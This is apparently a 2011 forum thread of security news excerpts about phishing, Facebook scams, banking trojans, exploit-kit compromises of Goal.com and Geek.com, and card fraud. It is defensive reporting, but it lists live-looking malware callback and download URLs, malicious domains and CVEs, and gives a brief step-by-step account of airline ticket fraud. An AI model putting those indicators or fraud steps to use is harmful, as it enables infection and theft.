(More detail at the ddanchev.blogspot URL above.)


2011-04-15, 20:24

Fraud - intuit TurboTax e-mails...
- http://security.intuit.com/alert.php?a=29
04/15/2011 - "... fraudulent email (copy shown at the URL above)...
What we won't do
- We will -never- send you an email with a "software update" or "software download" attachment.
- We will -never- send you an email asking you for login or password information to be sent to us.
- We will -never- ask you for your banking information or credit card information in an email. We will -never- ask you for confidential information about your employees in an email.
What we'll do
- We will provide you with instructions on how to stay current with your Intuit product, and we will provide you with information on how to securely download an update from your computer.
- If we need you to update your account information, we will request that you do so by logging into your account..."


2011-04-21, 12:59

Facebook scam "My Top 10 stalkers"...
- http://community.websense.com/blogs/securitylabs/archive/2011/04/19/facebook-scam-my-top-10-stalkers-targets-users-in-specific-countries.aspx
19 Apr 2011 - "A new spam campaign, similar to campaigns we have seen in the past, is spreading on Facebook... It works by creating an album - “My Top 10 stalkers” - with the description "Check who views your profile @," followed by a bit.ly URL-shortened link. It then automatically uploads a photo to the app and tries to mark all the user's friends in the photo... The bit.ly link redirects the user to a page that uses JavaScript to determine the geographical location of the computer based on its IP address. Depending on the location, the page then redirects users located in specific targeted countries to the Facebook App in an attempt to further spread the infected link. The campaign is targeted at Facebook users in the United States, Canada, United Kingdom (including a specific target for Great Britain), Saudi Arabia, Norway, Germany, Spain, Slovenia, Ireland, and United Arab Emirates... Regardless of whether the JavaScript redirects the browser to the Facebook app because of its origin, all users are ultimately redirected to a scam page that tries to lure them into completing several fake surveys. Hackers use this method to try to collect personal information such as the user's home address, e-mail address, or phone number... If the user tries to navigate away from the page or close the browser, a message appears asking them to stay and complete a "SPAM-free market research survey to gain access to this special content." Special it may sound, but it is definitely not spam-free! As always, if a page forces you to Like, Share, or install an application in order to view it, DON'T..."
(Screenshots available at the URL above.)


2011-04-23, 14:42

TDL rookit bypasses security on x64 Vista/Win7
- http://www.informationweek.com/news/security/vulnerabilities/229402086?printer_friendly=this-page
April 22, 2011 - "The malware state of the art continues to improve. In particular, the latest version of the TDL rootkit family - aka Olmarik, TDSS, Alureon - contains sophisticated mechanisms for bypassing security features built into 64-bit versions of Microsoft Windows Vista and Windows 7, and can download additional, standalone malware applications. The fourth version of the TDL malware first appeared* in August 2010 and contained sophisticated new techniques for defeating security measures... TDL4 can "load its kernel-mode driver on systems with an enforced kernel-mode code signing policy," meaning the 64-bit versions of Vista and Windows 7. At that point, the malware can hook directly into the Windows operating system... Since the fourth version of TDL first appeared, it's undergone numerous, incremental revisions. For example, in March 2011, a new version of TDL4 appeared that - after infecting a PC - installs the standalone Glupteba.D malware**, which can then download and execute other pieces of malware... no matter the security defense, such as driver signing, a way to defeat it can be found..."
* http://www.informationweek.com/news/security/vulnerabilities/228300365?printer_friendly=this-page

** http://resources.infosecinstitute.com/tdss4-part-1/
April 19, 2011


2011-04-25, 15:35

Virus Outbreak In Progress...
- http://www.ironport.com/toc/
April 25, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Microsoft Live Messenger Download Link E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23009
Fake Purchase Receipt E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23008
Malicious Program Download E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23007
Fake Malware Threat Notification E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23006
Fake UPS Shipment Error E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=19743
Malicious Video Link E-mail Messages - April 25, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=21895

Fake CNO Guidance Attachment E-mail Messages - April 21, 2011
- http://tools.cisco.com/security/center/viewAlert.x?alertId=22996
Malicious Photo Attachment E-mail Messages - April 22, 2011 ...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23003


2011-04-28, 17:11

Spamvertised "Successfull Order..." leads to scareware
- http://ddanchev.blogspot.com/2011/04/spamvertised-successfull-order-977132.html
April 28, 2011 - "A currently ongoing malware campaign is impersonating Bobijou Inc for malware-serving purposes.
Sample subject: "Successfull Order 977132"
Sample message: "Thank you for ordering from Bobijou Inc.This message is to inform you that your order has been received and is currently being processed.
Your order reference is 901802. You will need this in all correspondence. This receipt is NOT proof of purchase. We will send a printed invoice by mail to your billing address. You have chosen to pay by credit card. Your card will be charged for the amount of 262.00 USD and “Bobijou Inc”...
Sample attachments: Order_details.zip ...
Detection rates...
* http://www.virustotal.com/file-scan/report.html?id=0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904-1303915483
File name: Order details.exe
Submission date: 2011-04-27 14:44:43 (UTC)
Result: 24/40 (60.0%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faa19cd43e02b904-1303987793
File name: 1
Submission date: 2011-04-28 10:49:53 (UTC)
Result: 34/42 (81.0%)

>>> Upon execution phones back to: kkojjors.net/f/g.php -
variantov.com/pusk.exe -
** http://www.virustotal.com/file-scan/report.html?id=ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05-1303916125
File name: pusk.exe
Submission date: 2011-04-27 14:55:25 (UTC)
Result: 4/41 (9.8%)
There is a more up-to-date report...
- http://www.virustotal.com/file-scan/report.html?id=ee008f9039534f062bd277860060461064e760bdaa90a36595b9780be54a5a05-1303939887
File name: hew.exe.VIR
Submission date: 2011-04-27 21:31:27 (UTC)
Result: 11/41 (26.8%)


2011-04-29, 14:13

Malicious SPAM on the rise...
- http://labs.m86security.com/2011/04/malicious-spam-on-the-increase-again/
April 29, 2011 - "... our stats show the bot herders are gearing up again with the proportion of spam with malware attachments rising*, although still not as high as the peaks we saw mid last year... After the bot herders took a brief Easter break, they are back to sending new waves of malicious spam. The first spam campaign was sent by the Cutwail botnet earlier this week. The email claims to be an invoice from Bobijou Inc. – an online jewellery brand. There is a chance that people might fall into this trap especially as it claims money on your credit card was involved. But take a closer look at the subject line: Successfull Order 3677718, that wrong spelling should easily alert you that this email is a scam... Another malicious spam campaign originating from the Donbot botnet that came in later this week. It uses a common, uncreative theme with subject line like, “my hot pic : )“, “my naked pic is attached“, etc. The Donbot botnet’s spam output is on the rise and this is the first time we have seen it spreading malicious attachments... In addition, this week we have been seeing more of the Asprox botnet’s “Spam from your Facebook account” campaign, that preys on peoples fears about the security of their Facebook accounts. This campaign first came out last year, illustrating that the bot herders behind Asprox often cycle their spam campaigns between UPS, DHL, FEDEX and iTunes Gift Certificate among others... The attachment is a Trojan that aims to seed the Asprox bot executable in the infected host, which is then used for spamming purposes..."
* http://labs.m86security.com/wp-content/uploads/2011/04/maliciousSpam.png


2011-05-02, 08:31

Facebook Scam... leads to Adware
- http://labs.m86security.com/2011/05/facebook-scam-wired-news-iphone-5-first-exposure-leads-to-adware/
May 1, 2011 - "... we observed a new type of scam, this one leveraging Facebook’s new social plugin for websites that allow for comments. This is being exploited by scammers to get their rogue websites visible on users’ news feeds... There are various flavors of the scam making the rounds. However, the newest one to make the rounds focuses on a familiar Apple product: the iPhone. With rumors circulating about the iPhone 5, loyal Apple followers are drawn to the various news articles that cover these stories... The report claims to be from Wired News and has one of those headlines that is used to lure a user into clicking on the link... Once a user clicks on the link, they are -redirected- to a random .info site. There have been over 10 of these in circulation for this particular scam. Before the user can click on anything, they are asked to answer a CAPTCHA-like verification form... Unlike most Facebook scams of late, at the end of this rainbow, there is no survey scam. Instead, the users are prompted to download an executable file. The executable file is videogameboxinstaller.exe and it is dubious in nature, as it it downloads other pieces of software... PageRage notes in its terms above that it will display ads to the end user. Sounds like Adware? Four antivirus vendors agree*, flagging this as Adware.Yontoo... "
* http://www.virustotal.com/file-scan/report.html?id=e22484a77d66ca31a12af56fe9dcebdab63c7fbf92ba92e6c1e49a877c462b4a-1304294930
File name: pagerage.exe
Submission date: 2011-05-02 00:08:50 (UTC)
Result: 4/41 (9.8%)


2011-05-03, 20:57

Goal.com serving malware
- http://blog.armorize.com/2011/05/goalcom-serving-malware.html
5.02.2011 - "Goal.com receives 232,116 unique visitors per day according to compete.com, 215,989 according to checksitetraffic.com, and ranks 379 globally on alexa.com. Recently between April 27th to 28th, it was detected by HackAlert to be actively serving malware (drive-by downloads). From what we've observed, we believe the attacker has a way into goal.com's system and was only testing during this time. This is our technical report.
A. From what we've collected, parts of goal.com seem to have been compromised allowing the attacker to manipulate content at will. A backdoor may exist to allow the attacker continuous control of goal.com's content.
B. During this time we've observed different malicious scripts injected into goal.com, leading us to believe that this isn't a one-time mass SQL injection attempt. We've also not found the injected content to appear in other websites.
C. The malicious domains include:
1. pxcz .cz .cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
2. opofy7puti .cz .cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
3. justatest .cz .cc, which is neither being flagged by any antivirus blacklist nor by Google SafeBrowsing.
> This further suggests that this is an attack targeted at goal.com
D. Duration was between April 27th to 28th. The attacker seemed to be testing their injections and was picked up by our scanners.
E. Browser exploits used during this "test-drive" included: CVE-2010-1423 (Java), CVE-2010-1885 (MS help center HCP), CVE-2009-0927 (PDF), and CVE-2006-0003 (MS MDAC).
F. The g01pack exploit pack was being used. It includes a fake admin page which is used as a honeynet for security researchers--to allow the attacker to observe who is studying their malicious domains.
G. The exploit codes were well mutated. We don't mean well "obfuscated," because in addition to obfuscation, the primitive form of the exploit itself has been mutated well so as to avoid detection.
H. Malware served was packed with UPX and modifies setupapi.dll and sfcfiles.dat. When we first submitted it to VirusTotal, 4 out of 41 antivirus vendors were able to flag it.
I. The malware connects to the following domains:
1. testurl .ipq .co:80 (in UK), which again, is neither flagged by any antivirus blacklist nor by Google SafeBrowsing
2. :80 (US), which reverses back to coldgold .co .uk, and which again, isn't blacklisted by any, including Google SafeBrowsing.
3. banderlog .org, not flagged by antivirus / Google SafeBrowsing, but has some records on clean-mx.de..."

(More detail and screenshots available at the blog.armorize URL above.)


2011-05-05, 15:43

Osama alive scam - Twitter
- http://www.theregister.co.uk/2011/05/24/osama_alive_twitter_scam/
24 May 2011

Osama RTF Exploit
- http://www.f-secure.com/weblog/archives/00002154.html
May 5, 2011
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3334
- http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3335
CVSS v2 Base Score: 9.3 (HIGH)
- http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx
• V2.1 (April 12, 2011): Announced that the security update for Microsoft Office 2004 for Mac (KB2505924) offered in MS11-021, MS11-022, and MS11-023 also addresses the vulnerabilities described in this security bulletin.
- http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx
> CVE-2011-0097, CVE-2011-0098, CVE-2011-0101, CVE-2011-0103, CVE-2011-0104, CVE-2011-0105, CVE-2011-0978, CVE-2011-0979, CVE-2011-0980
- http://www.microsoft.com/technet/security/Bulletin/MS11-022.mspx
> CVE-2011-0655
- http://www.microsoft.com/technet/security/Bulletin/MS11-023.mspx
> CVE-2011-0107, CVE-2011-0977

SPAM - Osama dead pics
- http://www.symantec.com/connect/blogs/malware-and-phishing-attacks-flourish-following-news-osama-s-death
3 May 2011 - "The first spam using the news of Osama Bin Laden’s death was seen in the wild within three hours of the event—Symantec reported this spam activity along with other spam samples in a blog entitled “Osama Dead” is No Longer a Hoax. As anticipated, we started observing a rise in malicious and phishing attacks... The links in this spam email dump Downloader onto the victim’s machine, which in turn downloads the actual malware. Further analysis of these attacks shows that most of the malicious attacks have originated from Brazil, Europe, and the U.S... Spammers are making an effort to not only push the messages into users’ inboxes, but also getting them to open and install the executable payload... The phishing site shows an auto-running Bin Laden related video in an iframe and asks the user to click on a link to download a “complete” video. Clicking on that link forces the download of an .exe file..."

- http://community.websense.com/blogs/securitylabs/archive/2011/05/04/the-quot-real-quot-osama-bin-laden-dead-pics.aspx
04 May 2011 03:26 PM - "Messages inviting users to see the "real photos" of Osama Bin Laden's remains made the rounds in the email realm today, in addition to the Facebook scams and malware recently spread via Twitter abusing the same topic... Clicking on the provided link prompts the user to download a file called FOTOS.Terroris.zip, which is fairly detected by AV engines*."
* http://www.virustotal.com/file-scan/report.html?id=7fd720ada48132d4f93cfea23947ce40043f72c12ec0da4697dd162f86b16b1a-1304596429
File name: Fotos.exe.vir
Submission date: 2011-05-05 11:53:49 (UTC)
Result: 30/42 (71.4%)

- http://www.us-cert.gov/current/#osama_bin_laden_s_death
May 2, 2011

Osama malware scams spread to Facebook
- http://www.theregister.co.uk/2011/05/03/osama_malware_scams/
3 May 2011


2011-05-05, 16:33

Goal.com serving malware - updated...
- http://blog.armorize.com/2011/05/goalcom-serving-malware.html
Updates - "... The chain of infection is:
1. goal .com, includes iframe to pxcz .cz .cc
2. pxcz.cz.cc iframes to justatest .cz .cc
3. justatest .cz .cc runs the exploit pack g01pack, serves exploits based on visitor's browser type
4. exploit compromises browser, downloads malware from justatest .cz .cc
5. malware links to testurl .ipq .co (UK), :80 (US, coldgold .co .uk), and banderlog .org...
> A unique feature of this exploit pack is the inclusion of a fake admin / stats page. This page supports common id / password combinations like admin / admin to trick security researchers into believing that they've obtained access to the exploit pack's admin page... Once logged in, the researcher is presented with a fake infection stats page. In reality, this allows the attacker to gain insights into who has identified the malicious domain, and is conducting investigation...
The exploit codes were well mutated. We don't mean well "obfuscated," because in addition to obfuscation, the primitive form of the exploit itself has been mutated well so as to avoid detection..."

Goal.com spreading malware again: "Security Shield" fake anti-virus
- http://blog.armorize.com/2011/05/goalcom-spreading-malware-again.html


2011-05-11, 18:21

New bank trojan - "Sunspot"...
- http://www.trusteer.com/blog/windows-malware-morphs-financial-fraud-platform
11 May 2011 - "... identified a little known Windows malware platform that has been in circulation for some time, but was never previously recognized for its financial fraud capabilities. We named it Sunspot. It is currently targeting North American financial institutions and has already achieved SpyEye and Zeus–like infection rates in some regions. There are confirmed fraud losses associated with Sunspot, so the threat is real... In addition to Sunspot, Trusteer alone also has discovered several malware platforms over the past 18 months including Silon, OddJob and several others. Sunspot targets 32-bit and 64-bit Windows platforms from Windows XP through Windows 7, and is capable of installing in non-administrator and administrator accounts. Once installed, it targets Internet Explorer and Firefox browsers. This is a very modern malware platform with sophisticated fraud capabilities... According to a Virus Total analysis, only nine of 42 anti-virus programs tested, or 21%, currently detect Sunspot. It can carry out man-in-the-browser attacks including web injections, page grabbing, key-logging and screen shooting (which captures screenshots of the mouse vicinity as a user types his/her password on a virtual keyboard)... We traced the Sunspot Command and Control Server (C&C) hostname to a domain registered in Russia. Once installed, Sunspot is started either by "rundll32.exe" via HKCU\Software\Microsoft\Windows\CurrentVersion\Run or via HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components. It uses CBT hooking to load its DLL into the browser (Internet Explorer/Firefox). Inside the browser it hooks several Wininet/NSPR4/user32 functions for web injections, page grabbing and key-logging... The take away for financial institutions from Sunspot remains the same. A layered security approach that combines server-side and client-side zero day attack protection is the most effective way to protect users against crime ware, since anti-virus programs are lagging way behind in their ability to detect these programs."


2011-05-12, 14:14

Multiple Facebook scams...
- http://www.theregister.co.uk/2011/05/12/facebook_spam_prevention_scam/
12 May 2011 - "... junk messages on Facebook is been used to bait a new scam doing the rounds on the social network. Prospective marks in receipt of the fraudulent messages are invited to "verify" their account in order to "prevent spam". Recipients who respond to the message by clicking on a link end up sharing it on their wall as well as spreading highly obfuscated JavaScript... A full write-up of the scam, including images of the offending messaging, can be found in a blog post by Sophos here*..."
* http://nakedsecurity.sophos.com/2011/05/12/preventing-spam-scam-on-facebook-does-exactly-the-opposite
May 12, 2011

- http://www.f-secure.com/weblog/archives/00002157.html
May 12, 2011

- http://isc.sans.edu/diary.html?storyid=10870
Last Updated: 2011-05-12 08:38:17 UTC
- http://blog.trendmicro.com/dubious-javascript-code-found-in-facebook-application/


2011-05-13, 16:14

Win7/Vista e-mail malware - unicode tricks...
- http://www.theinquirer.net/inquirer/news/2070768/windows-malware-camouflaged-unicode-filename-trickery
May 13 2011 - "... Windows PC users have been warned about malware Trojans that camouflage malicious executable files using a fancy unicode trick*. Unicode is a computing industry standard that provides a unique number for every character you use, no matter what system you are using. With malicious trickery, criminals have worked out how to fiddle with unicode so that some characters in a Windows filename can be reversed. Security firm Norman* found malicious email attachments that appeared on the surface to have filenames with standard alphabetical characters, with unicode-capable viewers seeing nothing out of the ordinary. However, if you look at the file from a command prompt, it shows that the last bit of the filename has actually been reversed, and that this seemingly innocuous emailed file is actually an executable.
Norman tested other filenames, and found that the same unicode trick allowed files to hide the fact that they were executable in the email client Lotus Notes. The firm said that any filename could hide extensions like PDF and EXE using the trick.
The firm said that the issue only affects Windows Vista and Windows 7 users, as Windows XP users have to install support for right-to-left languages in order to be vulnerable..."
* http://norman.com/security_center/security_center_archive/2011/rtlo_unicode_hole


2011-05-17, 13:40

Geek.com hacked with an exploit kit
- http://research.zscaler.com/2011/05/geekcom-hacked-with-exploit-kit.html
May 15, 2011 - "... The attack vector remains the same, namely injecting a malicious HTML Iframe or script tag into the legitimate pages... the malicious Iframe is injected at the bottom of the page... -redirects- victims to a malicious website hosting an exploit kit. Once you visit, heavily obfuscated JavaScript is returned which will target various known vulnerabilities..."
(Screenshots and more detail available at the URL above.)

- http://www.theregister.co.uk/2011/05/17/geek_dot_com_infected/


2011-05-18, 19:22

Criminals trading in Twitter ...
- http://www.f-secure.com/weblog/archives/00002159.html
May 18, 2011 - "Surely nobody would sell stolen credit cards on Twitter? Except they do... he seems to sell credit card info, most likely collected with keyloggers from infected home computers. The prices of stolen credit cards range from $2 to $20, depending on the country where they were stolen from... if you'd rather not use stolen credit cards yourself, you can have him buy you iPhones, iPads and laptops with stolen credit cards and ship them to you. In practice, the thief will log into an online store, then purchase an iPad as a gift purchase, giving your address as the delivery address and paying for the good with a stolen credit card. An iPad bought like this goes for $150... But keyloggers collect more than credit cards. They also record passwords when you log into online services. So this vendor is also selling access to other people's online bank accounts. An account with a balance of $28,000 sells for $1,000... to prove he really has the goods, the vendor posts "demo" information. Which basically is personal information of handful of victims, including names, home addresses, credit card numbers and passwords...
The accounts shown above* have been reported to relevant authorities."
* (Screenshots and more detail at the f-secure URL above.)


2011-05-18, 23:46

Fraudsters suck $1.4 Billion from Airlines
- http://www.securityweek.com/fraudsters-suck-14-billion-airlines
May 18, 2011 - "According to recent survey findings coming from CyberSource*, a Visa company, airlines lost an estimated $1.4 billion due to online payment fraud in 2010. But with so many security checks that come along with air travel, how is this possible? A typical fraud scenario in the airline industry plays out like this:
1. A fraudster illegally obtains credit card data;
2. The fraudster obtains the name, address, and other appropriate information for a genuine customer interested in buying "discount" tickets;
3. The fraudster buys the ticket in the innocent person's name, using the stolen credit card number;
4. The fraudster delivers ticket to the customer and receives payment typically in cash..."
* http://www.cybersource.com/news_and_events/view.php?page_id=1900
May 18, 2011

... Meanwhile, the TSA "security" groping and fondling continues...


2011-05-19, 15:01

SpyEye attack on Verizon...
- http://www.trusteer.com/blog/spyeye-attack-verizon-exposes-pci-shortcomings
May 18, 2011 - "We recently discovered a configuration of the SpyEye Trojan targeting Verizon’s online billing page and attempting to steal payment card information. The attack took place between May 7th and 13th. SpyEye uses a technique called “HTML injection” to modify the pages presented in the victim’s browser, in this particular case the injected HTML is used to capture the following credit card related data. The attack is transparent to Verizon customers since the malware waits for the user to logon and access their billing page and only then injects an authentic-looking replica webpage that requests this information. Since the user has logged on and has navigated to the familiar billing page they have no reason to suspect this request for payment information is fraudulent... it continues a financial malware trend we have been tracking in recent weeks: a shift away from stealing usernames and passwords to stealing payment and credit card data... this practice allows criminals to commit card non present fraud on the Internet, and also makes it more difficult for banks to identify the source of fraudulent transactions since they cannot be traced back to a specific computer. Whether it’s on consumer machines, call center computers, or point of sale systems, attackers are targeting endpoints to steal readily available payment card data. This trend is exposing a major shortcoming in the Payment Card Industry Data Security Standard (PCI-DSS), which only requires endpoints to be running anti-virus software. As we have seen, anti-virus software is unable to effectively defend against zero day attacks..."
(More detail availalbe at the trusteer URL above.)


2011-05-20, 11:50

Fake Apple store order notifications...
- http://community.websense.com/blogs/securitylabs/archive/2011/05/19/an-apple-a-day-promotes-wikipharmacy.aspx
19 May 2011 - "Fake Apple Store Order Notifications have been making rounds for months now. The volume of this particular spam campaign is not as astonishing as other past campaigns. It is actually the exact opposite of those massive outbreaks that distribute hundreds of thousands of spam emails for a few hours and suddenly -stop- the next day. Typically, the email contains a link that -redirects- users to a very familiar pharmacy spam site. These links either belong to compromised sites or newly registered domains... Today, we noticed the same fake Apple Store email redirecting users to a different, relatively new pharmacy spam web template. The new template channels a wikipedia feel to it and is cleverly titled "WikiPharmacy". Looking deeper into the IP where this domain is hosted, we learned that it caters to over 24,000 other domains. These domains were all used in pharmacy spam campaigns at one point."
(Screenshots available at the websense URL above.)

- http://sunbeltblog.blogspot.com/2011/05/dear-apple-store-customer.html
May 20, 2011


2011-05-20, 16:40

PHP file injections - osCommerce malware: Cannot redeclare corelibrarieshandler
- http://blog.sucuri.net/2011/05/oscommerce-malware-cannot-redeclare-corelibrarieshandler.html
May 19, 2011 - "...for the last few days we started to see many of those osCommerce sites that were hacked, generating errors when trying to access them:
... Fatal error: Cannot redeclare corelibrarieshandler() ..
And according to Google, there is probably about 10k pages with this type of error. So what is going on? It seems that the attackers tried to inject more -malware- into sites, but made a mistake... at the top of every PHP file... Which instead of doing what they planned, caused all the sites to fail with this error “Fatal error: Cannot redeclare corelibrarieshandler() (previously declared in…”. Very annoying for both sides involved. To clean it up, you have to remove that piece of code from the top of every PHP file and properly secure osCommerce..."


2011-05-23, 22:25

64-bit banker rootkit spies on online customers
- http://www.h-online.com/security/news/item/64-bit-rootkit-spies-on-online-banking-customers-1247881.html
23 May 2011 - "... Kaspersky has discovered* another rootkit with 64-bit Windows support: a variant of the Banker rootkit is targeting the access credentials of online banking customers in Brazil. The malware is injected into systems via a hole in an obsolete version of Java and first disables the Windows User Account Control (UAC) feature so that it can go about its business without being interrupted. It then installs bogus root certificates and modifies the HOSTS file in such a way that victims trying to access the banking web site are redirected to a phishing site operated by the criminals. The injected certificate prevents the browser from issuing an alert when establishing an encrypted connection to the phishing site, and the victim is left unaware. Kaspersky says that the malware also deletes a security plug-in used by various Brazilian banks. Unusually, the malware installs a custom system driver to uninstall the security plug-in and modify the HOSTS file. On 64-bit Windows systems, this requires some effort because Microsoft's Kernel Patch Protection (PatchGuard) prevents unsigned drivers from being installed. As 64-bit Windows installations still have a relatively small market share, rootkits with 64-bit support are currently still quite rare; a 64-bit version of the Alureon/TDL rootkit was discovered last November..."
* http://www.securelist.com/en/blog/11266/Rootkit_Banker_now_also_to_64_bit


2011-05-24, 10:14

Pharmacy SPAM sucks...
- http://www.theregister.co.uk/2011/05/23/spam_economics/
23 May 2011 - "Computer scientists are advocating the targeting of card-processing middlemen as a way of clamping down on spam... the vast majority (95 per cent) of the credit card payments to unlicensed pharmaceutical sites are handled by just three payment processing firms – based in Azerbaijan, Denmark and Nevis, in the West Indies, respectively. By putting the squeeze on these firms it might be possible to choke the flow of money to spammers, making spam less profitable and, hopefully, less prevalent.
Pharmacy spam levels fluctuate but the class of junk mail has long been the biggest single category of spam. The findings came after three months of analysing spam data, broad crawling of naming and hosting infrastructures, and over 100 purchases from spam-advertised sites. The study* discovered that payment-processing for replica and software products advertised through spam was also monetised using merchant services from just a handful of banks. Spam makes up 74.8 per cent of all email messages, compared to 90 per cent last year, according to the latest statistics from Symantec, published last week. The net security efforts credits botnet takedown efforts, most notably against the infamous Rustock botnet, for the decrease..."
* http://cseweb.ucsd.edu/~savage/papers/Oakland11.pdf
(16-page pdf/2.3MB)

:fear: :mad:

2011-05-25, 15:42

Web-based attacks use JavaScript tricks...
- http://krebsonsecurity.com/2011/05/blocking-javascript-in-the-browser/
May 25, 2011 - "... Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. To protect yourself, it is critically important to have an easy method of selecting which sites should be allowed to run JavaScript in the browser. It is true that selectively allowing JavaScript on known, “safe” sites won’t block all malicious scripting attacks: Even legitimate sites sometimes end up running malicious code when scammers figure out ways to sneak tainted, bogus ads into the major online ad networks. But disallowing JavaScript by default and selectively enabling it for specific sites remains a much safer option than letting all sites run JavaScript unrestricted all the time... Noscript*... lets the user decide which sites should be allowed to run JavaScript, including Flash Player content. Users can choose to allow specific exceptions either permanently or for a single browsing session... Firefox.. offers the most options for dealing with JavaScript. But, whichever browser you use, be aware that running JavaScript can be the point of entry for intrusive and infectious malware. Use caution before deciding to allow it on any site that you visit."
* https://addons.mozilla.org/en-US/firefox/addon/noscript/
Downloads: 85,892,086...

:fear: :spider:

2011-05-25, 23:39

Fake VirusTotal site serves malware
- http://www.net-security.org/malware_news.php?id=1730
24.05.2011 - "VirusTotal - the popular free file checking website - has been spoofed by malware peddlers, warns Kaspersky Lab*. A simple -visit- to the site triggers the download of a worm via a java applet embedded in the code... It's aim is to recruit the computer it infected into a botnet that would ultimately be used to perform DDoS attacks, and to communicate to the C&C information about the system (hostname, type and version of the OS, etc.)... malware peddlers have lately begun combining the use of malicious JavaScript code and social engineering techniques, since it allows them to infect computers regardless of the browser or operating system used."
* http://www.securelist.com/en/blog/208188086/Fake_virustotal_website_propagated_java_worm
"... the website looks the same way as the original**. However, hidden in the source the parameters needed to infect the system through a java applet through which discharge completely silent malware..."
** http://www.securelist.com/en/images/pictures/klblog/208188087.png
(Screenshot at the URL above.)

(Hat tip to cnm @ spywareinfoforum.com)

:fear: :mad: :mad:

2011-05-27, 01:00

Fake Epsilon phish - Breach Warning...
- http://isc.sans.edu/diary.html?storyid=10930
Last Updated: 2011-05-26 14:53:19 UTC - "... website that attempts to scare people into purchasing a credit report. The website... reminds the visitor of the relatively recent Epsilon data breach. The goal is to persuade the person into proceeding to another site that is being promoted. This looks like a technique to make money through affiliate marketing..."
(Screenshot and more detail at the URL above.)

:fear: :mad:

2011-05-30, 17:44

SPAMbot stats for May 2011
- http://www.m86security.com/labs/bot_statistics.asp
Week ending May 29, 2011

- http://labs.m86security.com/2011/05/donbots-money-maker-gambling-scheme/
May 26, 2011 - "... the Donbot botnet changed its spam campaign to one promoting online casinos. The barrage of of Fake AV we saw coming out of Donbot suddenly stopped and within 15 minutes we started receiving this new campaign... Upon downloading the Casino-Online.exe binary and scanning it through VirusTotal.com, 4 of 42 antivirus packages detected it, with the following results: “RealTimeGaming, CasOnline, Artemis!B7E6F50C181D, and W32/Malware.SWHU” ..."

- http://labs.m86security.com/2011/05/new-bots-old-bots-xarvester-returns/
May 24, 2011 - "... big rise in spam from two botnets well known to us from the past – Donbot and Xarvester. Six months ago, spam from these botnets hardly got our attention... someone has breathed new life into these spamming machines..."


2011-05-30, 23:36

Money mule recruiters ...
- http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short_30.html
May 30, 2011 - "... currently active money mule recruitment web sites, actively recruiting money mules for the processing of fraudulently obtained funds... Currently active sites residing within AS42708, PORTLANE Network www .portlane .com; AS29713, INTERPLEXINC Interplex LLC; AS38913, Enter-Net-Team-AS; AS24940, HETZNER-AS Hetzner Online... Monitoring of money mule recruitment campaigns is ongoing."
(Screenshot and more detail available at the ddanchev URL above.)

- http://www.google.com/safebrowsing/diagnostic?site=AS:42708
- http://www.google.com/safebrowsing/diagnostic?site=AS:29713
- http://www.google.com/safebrowsing/diagnostic?site=AS:38913
- http://www.google.com/safebrowsing/diagnostic?site=AS:24940


2011-06-02, 14:06

Bulk SPAM msgs... Bulker .biz...
- http://blogs.technet.com/b/mmpc/archive/2011/06/01/fake-canadian-pharma-site-causing-headaches.aspx
1 Jun 2011 - "... Yahoo email account was hacked... his email account was used to send over 20 emails with links to domains like “Canadian Neighbor Pharmacy” to his contact lists at 2:59 AM in the morning, while he was asleep... spam messages sent in bulk by a spammer... the “Canadian Neighbor Pharmacy” site is part of a list of sites promoted by an underground organization called “Bulker .biz”. This organization encourages spammers and hackers to target email recipients from domains like Yahoo.com, Aol.com, Hotmail.com, etc. The site itself functions as a front for credit card fraud and identity theft by targeting unwitting users that register an account on the site and order promoted pharmaceuticals that may never arrive... Be alert to email messages with typos or bad form and a single hyperlink with little or no explanation about the link itself..."
(Screenshots and more detail at the technet URL above.)


2011-06-03, 12:47

LinkedIn SPAM emails download malware
- http://www.trusteer.com/blog/linkedin-spam-emails-download-malware
June 02, 2011 - "LinkedIn has more than 90 million members, many of which are business users... In the last couple of days, we've witnessed a malware campaign that targets LinkedIn users. It starts with a simple connect request sent to the victim's mailbox... If you click the "Confirm that you know" link on the genuine email, it takes you to LinkedIn's website. However if the same button is clicked on the fraudulent email, it takes you to a malicious website that downloads malware onto your computer. The fraudulent website is hxxp: //salesforceappi .com/ loginapi.php?tp=1da14085e243eaf9 ...The domain salesforceappi .com was registered two days ago and the IP address of the server is in Russia. The domain was designed to look like it's associated with Salesforce.com but in fact it has nothing to do with Salesforce .com. The malicious server uses the BlackHole exploit kit to download malware to the victim's computer... recently made available for free... It is based on PHP and has a MySQL database. Thousands of websites have been infected with BlackHole which is used to exploit vulnerabilities on visitors’ computers in order to place malware on them... drive by download... we've recently seen evidence of Zeus targeting enterprise networks in order to steal proprietary information and to gain unauthorized access to sensitive systems... Only two anti-malware solutions out of 42 detect this variant at the moment*..."
(Screenshots and more detail available at the trusteer URL above.)
* http://www.virustotal.com/file-scan/report.html?id=869579adb68399f2cadc684e49dfed0b149ee250c58e3c21845f1ee2514c5d37-1306969338
File name: file-2324493_swat
Submission date: 2011-06-01 23:02:18 (UTC)
Result: 2/42 (4.8%)

